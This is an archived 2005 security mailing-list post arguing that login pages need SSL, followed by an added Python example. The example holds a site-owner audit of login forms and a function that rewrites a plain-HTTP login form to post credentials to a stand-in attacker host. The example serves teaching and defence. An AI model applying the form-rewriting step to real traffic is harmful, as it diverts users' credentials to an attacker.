WebApp Sec mailing list archives
Rephrased: Should login pages be protected by SSL - although it won't help most users?
From: Amir Herzberg <herzbea () macs biu ac il>
Date: Thu, 23 Jun 2005 08:29:22 +0200
Ole Kasper Olsen wrote: ...
Amir Herzberg asked the question of "should login pages be SSL encrypted". The flurry of discussion can be summarized as "Yes" ... 2. Most people believe that a login page *should* be encrypted for web sites carrying important data (e.g., financial, etc.).
And many such sites are not protected, see `Hall of Shame` (link below)
Encryption is not the point. Authentication is. A login page will never contain sensitive data anyway and as long as the form is submitted to a secure server, the data is encrypted just fine. A problem arises when a customer is tricked into entering credentials at a bogus site.
Absolutely.
SSL/TLS has decent capability for providing authentication; however, the sad truth is (as Michael Silk noted) that a vast majority of surfers neither understand nor read certificates. People don't even look at the URL (many (probably very successful) scams just rely on a semi-decent-looking link which points to an IP address).
This is correct, given the current security indicators in browsers; I even have some empirical data to support this (but it is also common sense). However, the use of SSL may help _some_ users:
-- The few users who carefully check the URL, padlock, certificate
-- Users who install browsers/extensions providing improved security/identification indicators such as our TrustBar
People in favor of unprotected login pages (mostly people in charge of them?) claim that both users groups above are negligible and do not justify using SSL.
I disagree; for example, TrustBar is available through multiple sites, and I have statistics only from http://addons.mozilla.org, where I have over 25000 downloads. BTW, this site also allows user feedback, which you are encouraged to leave; I read it carefully, and I believe our next release will in fact take care of almost all concerns raised by users.
And of course there are other improved security indicator solutions, such as Netcraft and TrustToolBar (although I don't like their privacy invasion and overhead).
This situation is also not helping convince browser folks to add the improved security UI to the browser (so I can get rid of developing TrustBar... I have some other research projects to take care of!)
--
Best regards,
Amir Herzberg
Associate Professor, Department of Computer Science, Bar Ilan University
http://AmirHerzberg.com
Hall Of Shame of Unprotected Login pages: http://AmirHerzberg.com/shame.htm
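The point argued in the message above (an HTTP-served login page that posts to an HTTPS URL gives the user nothing to verify, and a bogus destination can be substituted without any visible change) is easy to see in code. The following is an added example, not code from the post, from TrustBar, or from any of the sites discussed; the hostnames, the page HTML, the attacker host and the function names are all constructed for illustration. It shows both halves: what an on-path attacker can do to a plain-HTTP login page in transit, and a small audit a site owner could run over their own pages to catch the three conditions the thread cares about (page not on HTTPS, form not posting to HTTPS, form posting to a different host).

```python
"""
Added example (not part of the mailing-list post). Constructed data only.

rewrite_form_action(): what an on-path attacker can do to an HTTP-delivered
  login page: point the form at a host they control. The page showed no
  padlock before and shows none after, so the user has nothing to check.
audit_login_page(): checks a site owner can run over their own login pages:
  is the page served over HTTPS, does the form post over HTTPS, and does it
  post to the same host the page came from?
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
import re


class _FormActions(HTMLParser):
    """Collect the action attribute of every <form> that holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of [action, has_password_field]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
            self.forms.append(self._current)
        elif (tag == "input" and self._current is not None
              and (a.get("type") or "").lower() == "password"):
            self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def login_form_actions(page_url, html):
    """Absolute action URLs of the forms on the page that contain a password field."""
    parser = _FormActions()
    parser.feed(html)
    return [urljoin(page_url, action) for action, has_pw in parser.forms if has_pw]


def audit_login_page(page_url, html):
    """Return a list of findings; an empty list means the page passes all three checks."""
    findings = []
    page = urlparse(page_url)
    if page.scheme != "https":
        findings.append("page served over %s: no padlock, and the page can be altered in transit"
                        % page.scheme)
    actions = login_form_actions(page_url, html)
    if not actions:
        findings.append("no form with a password field found")
    for action in actions:
        target = urlparse(action)
        if target.scheme != "https":
            findings.append("form posts credentials over %s to %s" % (target.scheme, action))
        if target.hostname != page.hostname:
            findings.append("form posts to %s, not to the page's own host %s"
                            % (target.hostname, page.hostname))
    return findings


def rewrite_form_action(html, attacker_action):
    """The on-path attacker's edit: swap the first form's action for the attacker's URL.
    Everything else, including any reassuring text on the page, is left untouched."""
    pattern = re.compile(r'(<form\b[^>]*\baction=")[^"]*(")', re.IGNORECASE)
    return pattern.sub(lambda m: m.group(1) + attacker_action + m.group(2), html, count=1)


# Constructed sample: a login page served the way the "HTTP page, HTTPS form" camp serves it.
ORIGINAL_URL = "http://bank.example/login"
ORIGINAL_HTML = """<html><body>
<p>Your credentials are sent securely.</p>
<form action="https://bank.example/auth" method="post">
  <input name="user"><input name="pass" type="password"><input type="submit">
</form></body></html>"""

# The same page as it would arrive after an on-path attacker rewrites it (constructed attacker host).
TAMPERED_HTML = rewrite_form_action(ORIGINAL_HTML, "https://bank-example.attacker.test/auth")

if __name__ == "__main__":
    for label, url, html in (("as served", ORIGINAL_URL, ORIGINAL_HTML),
                             ("after tampering", ORIGINAL_URL, TAMPERED_HTML),
                             ("served over HTTPS", "https://bank.example/login", ORIGINAL_HTML)):
        print(label + ":")
        for finding in audit_login_page(url, html) or ["no findings"]:
            print("  -", finding)
```

The first two runs both flag the HTTP delivery; only the second flags the foreign host, and the user's browser would have shown the same (padlock-less) page in both cases. The third run, the page itself served over HTTPS, is the configuration the "Hall of Shame" linked above is asking for, and it is the only one where the tampering step is not available to a network attacker in the first place.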